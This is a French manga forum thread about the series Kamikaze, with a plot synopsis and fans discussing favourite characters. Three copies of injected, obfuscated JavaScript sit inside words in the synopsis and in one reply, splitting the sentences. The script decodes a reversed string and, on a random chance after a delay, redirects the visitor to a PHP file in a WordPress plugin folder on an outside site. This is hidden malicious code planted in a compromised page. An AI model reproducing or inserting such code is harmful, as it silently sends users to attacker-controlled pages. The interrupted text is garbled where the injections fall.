Kamikaze

Pour discuter de manga, de bd et de comics
Répondre
Avatar du membre
Septine Madrona
Dragon Noir
Dragon Noir
Messages : 256
Enregistré le : 23 nov. 2008, 19:34
Localisation : Libourne (33)
Contact :

Kamikaze

Message par Septine Madrona »

Image

Tokyo, la station de métro Shin Ichigaya est le théâtre de ce drame planétaire. Des guerriers aux fabuleux pouvoirs partent à la recherche de la mystérieuse "Fille de l'Eau". Mais sur leur chemin, se dresse bientôt Kamuro Ishigami. Armé d'un katana magique baptisé Kamikaze, il réussit à défaire tous ses ennemis. Les deux partis finissent par réaliser que le plus important, dans l'immédiat, est de retrouver la "Fille de l'Eau" et ils décident d'un commun accord de cesser le combat. Leurs routes se croisent de nouveau devant l'école de la jeune Misao Mikogami.
Orpheline, elle vient d'être adoptée. Comme tous les enfants de son âge, elle est confrontée aux problèmes quotidiens des écoliers. Un jour, son amie Sakuraï et d'étranges individus qui l'appellent Aïguma font irruption dans l'établissement scolaire. Elle réalise alors qu'elle est la "Fille de l'Eau", descendante des cinq gr$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ands de Kunitsu du peuple des Matsurowanu Kegainotami, les rebelles "non illuminés", et qu'elle a une mission à accomplir.
Encore une fois, Kamuro Ishigami intervient et réussit à repousser les assaillants. Plus tard, Misao raconte son aventure à son amie et journaliste Keiko Mase qui lui conseille de retourner à l'école. Mais d'autres intrus investissent bientôt les lieux, dévastant tout sur leur passage. Pour éviter un nouveau bain de sang, Misao décide de se rendre.
Elle découvre que les Kegainotami veulent se servir d'elle pour ressusciter les 88 bêtes.
Image
Avatar du membre
yami627
Dragon d'Argent
Dragon d'Argent
Messages : 173
Enregistré le : 10 avr. 2011, 19:56

Re: Kamikaze

Message par yami627 »

j'ai l'intégrale de la série ^^ je l'adore et vive Kamuro et MIsao ^^
Image
Avatar du membre
Septine Madrona
Dragon Noir
Dragon Noir
Messages : 256
Enregistré le : 23 nov. 2008, 19:34
Localisation : Libourne (33)
Contact :

Re: Kamikaze

Message par Septine Madrona »

Cool, tu es la première fan que je rencontre! ^^
Moi j'adore Kikunosuké, Kaede et Kayano. Mais c'est vrai que le couple Kamuro / Misao est bien.
Mais tous les personnages ont leur truc.
Image
Avatar du membre
yami627
Dragon d'Argent
Dragon d'Argent
Messages : 173
Enregistré le : 10 avr. 2011, 19:56

Re: Kamikaze

Message par yami627 »

Kikunosuke est pas mal c'est brai ^^ et la petite avec le chien (honte sur moi j'ai oublié le nom XD)
Image
Avatar du membre
Septine Madrona
Dragon Noir
Dragon Noir
Messages : 256
Enregistré le : 23 nov. 2008, 19:34
Localisation : Libourne (33)
Contact :

Re: Kamikaze

Message par Septine Madrona »

C'est Béniguma! ;)
Image
Avatar du membre
Lloyd
Dragon d'Argent
Dragon d'Argent
Messages : 100
Enregistré le : 08 mars 2009, 03:59
Localisation : Normandie
Contact :

Re: Kamikaze

Message par Lloyd »

Ah ca je connais, mais j'ai jamais lu...
Ça fait longtemps qu'un ami doit me les prêter. Je devrais lui redem$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ander ou les lire qu$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and je squatterais chez lui :D
Image
Avatar du membre
yami627
Dragon d'Argent
Dragon d'Argent
Messages : 173
Enregistré le : 10 avr. 2011, 19:56

Re: Kamikaze

Message par yami627 »

lis-les !!!! bon, c'est assez spéc. a certains moment XD (public avertis XD) mais l'histoire et les personnages sont tellement prenants !!! et les dessins magnifiques !!
Image
Répondre